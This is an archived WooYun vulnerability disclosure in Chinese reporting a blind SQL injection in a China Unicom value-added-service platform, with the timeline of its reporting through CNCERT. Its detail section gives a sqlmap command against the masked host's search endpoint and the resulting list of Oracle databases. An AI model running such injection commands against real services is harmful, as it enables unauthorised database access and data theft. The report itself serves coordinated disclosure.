中国联通某增值业务平台post注入

2015年8月12日01:06:49评论233 views字数 220阅读0分44秒阅读模式

摘要

2014-11-16：细节已通知厂商并且等待厂商处理中
2014-11-19：厂商已经确认，细节仅向厂商公开
2014-11-29：细节向核心白帽子及相关领域专家公开
2014-12-09：细节向普通白帽子公开
2014-12-19：细节向实习白帽子公开
2014-12-29：细节向公众公开

漏洞概要关注数(3) 关注此漏洞

缺陷编号： WooYun-2014-83290

漏洞标题：中国联通某增值业务平台post注入

漏洞作者：郭嘉

提交时间： 2014-11-16 17:44

公开时间： 2014-12-29 17:46

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

中国联通某增值业务平台post，oracle盲注

详细说明：

code 区域

sqlmap -u "**.**.**.**/thqm/searchCy.action" --data="content=1234" --dbs

code 区域

available databases [16]:
 [*] CTXSYS
 [*] DBSNMP
 [*] DMSYS
 [*] EXFSYS
 [*] MDSYS
 [*] OLAPSYS
 [*] ORDSYS
 [*] OUTLN
 [*] SCOTT
 [*] SYS
 [*] SYSMAN
 [*] SYSTEM
 [*] THQM
 [*] TSMSYS
 [*] WMSYS
 [*] XDB

漏洞证明：

修复方案：

盲注，时间关系就不深入了。。。

过滤一下就好

版权声明：转载请注明来源郭嘉@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-11-19 11:02

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-11-14 19:39 | nextdoor ( 普通白帽子 | Rank:332 漏洞数:75 | Just for fun)

3

三国杀玩多了吧

1# 回复此人

漏洞概要 关注数(3) 关注此漏洞

缺陷编号： WooYun-2014-83290

漏洞标题： 中国联通某增值业务平台post注入

相关厂商： 中国联通

漏洞作者： 郭嘉